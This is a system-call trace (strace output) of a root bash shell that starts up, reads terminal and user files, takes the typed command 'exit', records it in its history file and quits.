796   18:54:37 [4003acb5] rt_sigprocmask(SIG_BLOCK, [CHLD TSTP TTIN TTOU], [], 8) = 0 <0.000008>
796   18:54:37 [400c8b54] ioctl(255, TIOCSPGRP, [796]) = 0 <0.000028>
796   18:54:37 [4003acb5] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 <0.000006>
796   18:54:37 [4003aae2] rt_sigaction(SIGINT, {0x804bc20, [], 0x4000000}, {0x804bc20, [], 0x4000000}, 8) = 0 <0.000006>
796   18:54:37 [400c8a6c] brk(0x80a1000) = 0x80a1000 <0.000016>
796   18:54:37 [400c2a24] open("/etc/termcap", O_RDONLY) = 4 <0.000027>
796   18:54:37 [400c1cd3] fstat(4, {st_mode=S_IFREG|0644, st_size=625272, ...}) = 0 <0.000009>
796   18:54:37 [400cbafd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000 <0.000015>
796   18:54:37 [400ce1e9] _llseek(4, 0, [0], SEEK_SET) = 0 <0.000008>
796   18:54:37 [400c2ad4] read(4, "######## TERMINAL TYPE DESCRIPTI"..., 4096) = 4096 <0.000054>
796   18:54:37 [400c2ad4] read(4, "or their hardware\n# (notably DEC"..., 4096) = 4096 <0.000026>
796   18:54:37 [400c2ad4] read(4, "The terminal enquire string <u9>"..., 4096) = 4096 <0.000026>
796   18:54:37 [400c2ad4] read(4, " redistribute freely.\n# There ar"..., 4096) = 4096 <0.000023>
796   18:54:37 [400c2a8d] close(4)      = 0 <0.000010>
796   18:54:37 [400cbb41] munmap(0x40015000, 4096) = 0 <0.000012>
796   18:54:37 [400c8b54] ioctl(0, TIOCGWINSZ, {ws_row=25, ws_col=80, ws_xpixel=0, ws_ypixel=0}) = 0 <0.000010>
796   18:54:37 [400c8b54] ioctl(0, TIOCGWINSZ, {ws_row=25, ws_col=80, ws_xpixel=0, ws_ypixel=0}) = 0 <0.000007>
796   18:54:37 [400c8b54] ioctl(0, TCGETS, {B38400 opost isig icanon echo ...}) = 0 <0.000011>
796   18:54:37 [400ae2b7] getuid()      = 0 <0.000006>
796   18:54:37 [400c2a24] open("/etc/passwd", O_RDONLY) = 4 <0.000025>
796   18:54:37 [400c2ce4] fcntl(4, F_GETFD) = 0 <0.000007>
796   18:54:37 [400c2ce4] fcntl(4, F_SETFD, FD_CLOEXEC) = 0 <0.000006>
796   18:54:37 [400c1cd3] fstat(4, {st_mode=S_IFREG|0644, st_size=704, ...}) = 0 <0.000008>
796   18:54:37 [400cbafd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000 <0.000015>
796   18:54:37 [400c2ad4] read(4, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 704 <0.000034>
796   18:54:37 [400c2a8d] close(4)      = 0 <0.000009>
796   18:54:37 [400cbb41] munmap(0x40015000, 4096) = 0 <0.000011>
796   18:54:37 [400c16cd] stat("/root/.inputrc", 0xbffff4b8) = -1 ENOENT (No such file or directory) <0.000027>
796   18:54:37 [400c8a6c] brk(0x80a2000) = 0x80a2000 <0.000013>
796   18:54:37 [400c8a6c] brk(0x80a3000) = 0x80a3000 <0.000009>
796   18:54:37 [400c8a6c] brk(0x80a4000) = 0x80a4000 <0.000009>
796   18:54:37 [4003acb5] rt_sigprocmask(SIG_BLOCK, [INT], [], 8) = 0 <0.000008>
796   18:54:37 [400c8b54] ioctl(0, TCGETS, {B38400 opost isig icanon echo ...}) = 0 <0.000014>
796   18:54:37 [400c8b54] ioctl(0, SNDCTL_TMR_START, {B38400 opost isig -icanon -echo ...}) = 0 <0.000016>
796   18:54:37 [400c8b54] ioctl(0, TCGETS, {B38400 opost isig -icanon -echo ...}) = 0 <0.000009>
796   18:54:37 [4003acb5] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 <0.000007>
796   18:54:37 [4003aae2] rt_sigaction(SIGINT, {0x807d4d0, [], 0x4000000}, {0x804bc20, [], 0x4000000}, 8) = 0 <0.000010>
796   18:54:37 [4003aae2] rt_sigaction(SIGALRM, {0x807d4d0, [], 0x4000000}, {0x804b8c0, [HUP INT ILL TRAP ABRT BUS FPE USR1 SEGV USR2 PIPE ALRM TERM XCPU XFSZ VTALRM PROF UNUSED], 0x4000000}, 8) = 0 <0.000006>
796   18:54:37 [4003aae2] rt_sigaction(SIGWINCH, {0x807d490, [], 0x4000000}, {SIG_DFL}, 8) = 0 <0.000007>
796   18:54:37 [400c1cd3] fstat(2, {st_mode=S_IFCHR|0620, st_rdev=makedev(4, 1), ...}) = 0 <0.000011>
796   18:54:37 [400cbafd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000 <0.000017>
796   18:54:37 [400c8b54] ioctl(2, TCGETS, {B38400 opost isig -icanon -echo ...}) = 0 <0.000010>
796   18:54:37 [400c2b14] write(2, "bash# ", 6) = 6 <0.000045>
796   18:54:37 [400c2ad4] read(0, "e", 1) = 1 <4.780224>
796   18:54:42 [400c2b14] write(2, "e", 1) = 1 <0.000029>
796   18:54:42 [400c2ad4] read(0, "x", 1) = 1 <0.219311>
796   18:54:42 [400c2b14] write(2, "x", 1) = 1 <0.000022>
796   18:54:42 [400c2ad4] read(0, "i", 1) = 1 <0.154146>
796   18:54:43 [400c2b14] write(2, "i", 1) = 1 <0.000022>
796   18:54:43 [400c2ad4] read(0, "t", 1) = 1 <0.162114>
796   18:54:43 [400c2b14] write(2, "t", 1) = 1 <0.000020>
796   18:54:43 [400c2ad4] read(0, "\r", 1) = 1 <0.132661>
796   18:54:43 [400c2b14] write(2, "\n", 1) = 1 <0.000048>
796   18:54:43 [4003acb5] rt_sigprocmask(SIG_BLOCK, [INT], [], 8) = 0 <0.000009>
796   18:54:43 [400c8b54] ioctl(0, SNDCTL_TMR_START, {B38400 opost isig icanon echo ...}) = 0 <0.000022>
796   18:54:43 [400c8b54] ioctl(0, TCGETS, {B38400 opost isig icanon echo ...}) = 0 <0.000006>
796   18:54:43 [4003acb5] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 <0.000005>
796   18:54:43 [4003aae2] rt_sigaction(SIGINT, {0x804bc20, [], 0x4000000}, {0x807d4d0, [], 0x4000000}, 8) = 0 <0.000008>
796   18:54:43 [4003aae2] rt_sigaction(SIGALRM, {0x804b8c0, [], 0x4000000}, {0x807d4d0, [], 0x4000000}, 8) = 0 <0.000006>
796   18:54:43 [4003aae2] rt_sigaction(SIGWINCH, {SIG_DFL}, {0x807d490, [], 0x4000000}, 8) = 0 <0.000007>
796   18:54:43 [4003aae2] rt_sigaction(SIGINT, {0x804bc20, [], 0x4000000}, {0x804bc20, [], 0x4000000}, 8) = 0 <0.000007>
796   18:54:43 [400c8a6c] brk(0x80a5000) = 0x80a5000 <0.000018>
796   18:54:43 [400c2b14] write(2, "exit\n", 5) = 5 <0.000058>
796   18:54:43 [4003aae2] rt_sigaction(SIGINT, {0x804bc20, [], 0x4000000}, {0x804bc20, [], 0x4000000}, 8) = 0 <0.000008>
796   18:54:43 [400c16cd] stat("/root/.bash_history", {st_mode=S_IFREG|0600, st_size=2000, ...}) = 0 <0.000027>
796   18:54:43 [400c2a24] open("/root/.bash_history", O_WRONLY|O_APPEND) = 4 <0.000018>
796   18:54:43 [400c2b14] write(4, "exit\n", 5) = 5 <0.000016>
796   18:54:43 [400c2a8d] close(4)      = 0 <0.000010>
796   18:54:43 [4003acb5] rt_sigprocmask(SIG_BLOCK, [CHLD TSTP TTIN TTOU], [], 8) = 0 <0.000007>
796   18:54:43 [400c8b54] ioctl(255, TIOCSPGRP, [795]) = 0 <0.000030>
796   18:54:43 [4003acb5] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0 <0.000006>
796   18:54:43 [400ae5d1] setpgid(0, 795) = 0 <0.000022>
796   18:54:43 [400cbb41] munmap(0x40015000, 4096) = 0 <0.000019>
796   18:54:43 [400add1d] _exit(0)      = ?
